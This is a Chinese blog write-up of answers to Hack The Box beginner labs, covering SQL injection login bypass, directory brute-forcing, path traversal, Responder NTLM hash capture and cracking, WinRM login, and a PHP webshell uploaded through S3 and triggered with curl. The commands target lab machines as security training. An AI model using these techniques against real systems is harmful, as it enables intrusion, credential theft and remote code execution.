Hack The Box 1基础(1-5)

本文探讨了SQL注入攻击(A03:2021-Injection)以及如何通过StructuredQueryLanguage(SQL)进行安全漏洞探测,如使用ApacheHTTPd2.4.38中的目录遍历。文章涉及Web服务器配置、目录权限、404错误处理和WAF拦截,还展示了如何利用工具如DirBuster进行目录爆破,以及应对如Responder的网络渗透手段。同时,文中提到了PHP、AWSS3、Windows系统漏洞利用和密码破解技术。
摘要由CSDN通过智能技术生成

Apointment

答案:Structured Query Language(结构化查询语言)

答案:sql injection(sql注入)

答案:A03:2021-Injection

答案:Apache httpd 2.4.38 ((Debian))    使用-sV

答案:443

答案:directory

答案:404

(1xx信息响应表示服务器收到请求,需要请求者继续执行操作)

(2xx成功请求并处理)

(3xx重定向,需要进一步完成重定向后的内容的操作)

(4xx客户端错误请求包含错误语法或攻击参数waf拦截)

(5xx服务器错误,服务器处理用户请求时发生错误)

答案:dir(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)

答案:#

答案:congratulations

万能密码admin' #进入即可

Sequel

答案:3306

答案:MariaDB

答案:-u

答案:root(mysql -h 10.129.95.232 -P 3306 -u root -p)

答案:*

答案:;

答案:htb

答案:

Crocodile

答案:-sC

答案:vsftpd 3.0.3

答案:230

答案:anonymous

答案:get

答案:admin

答案:apache httpd 2.4.41

答案:-x(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)

答案:login.php

答案:从ftp中get出来的两个文件登录

Responder

答案:unika.htb

hosts解析

80端口有重定向可以通过修改hosts文件来解析其域名,添加IP地址和重定向跳转的域名,从而可以成功显示网站页面信息

 答案:php(抓包,指纹验证,nmap加参数扫描等都可以得到)

答案:page

答案:../../../../../../../../windows/system32/drivers/etc/hosts

答案://10.10.14.6/somefile

答案:New Technology LAN Manager

答案:-I

答案:john the ripper (John介绍及常用命令使用说明_john使用-CSDN博客

sudo responder -I tun0(使用responder来监听指定网卡,可以看到监听的网卡的信息)

内网渗透-Responder捕获Win哈希_responder 渗透-CSDN博客

通过访问指定的那个网卡IP地址来远程访问文件或者使用浏览器,responder就能抓取hash

进入responder目录下

用sudo ./DumpHash.py来导出抓取到的hash,然后使用john来破解hash得到密码

此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt

答案:badminton

答案:5985

答案:

由于80端口页面没有flag查看5985端口搜索后发现,为远程管理

evil-winrm -i host  -p badminton -u administrator

成功连接

成功拿到flag

Three

答案:2

答案:thetoppers.htb(开80端口直接访问ip得到)

答案:/etc/hosts(responder关用到过)

答案:s3.thetoppers.htb

根据任务2可知域名thetoppers.htb

sudo gobuster vhost -u http://thetoppers.htb  -w /usr/share/wordlists/domain_dic.txt  

Web 扫描神器:Gobuster 保姆级教程(附链接)_gobuster参数-CSDN博客

答案:amazon S3

爆破出的子域名不可访问修改hosts通过解析

答案:awscli

答案:apt-get install awscli、aws configure

配置

tldr aws可查看工具用法 使用前更新 tldr --update

答案:AWS S3 LS

答案:php

在中使用终端节点 AWS CLI - AWS Command Line Interface (amazon.com)

答案:

通过工具访问

写个一句话木马上传shell

aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb 查看是否上传

因为get可以浏览器访问或者curl访问curl -v http://thetoppers.htb/shell.php?cmd=id

存在回显说明成功

一种是用参数直接搜索

一种是反弹shell (HTB_Three之aws s3拿shell_htb three-CSDN博客)

HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值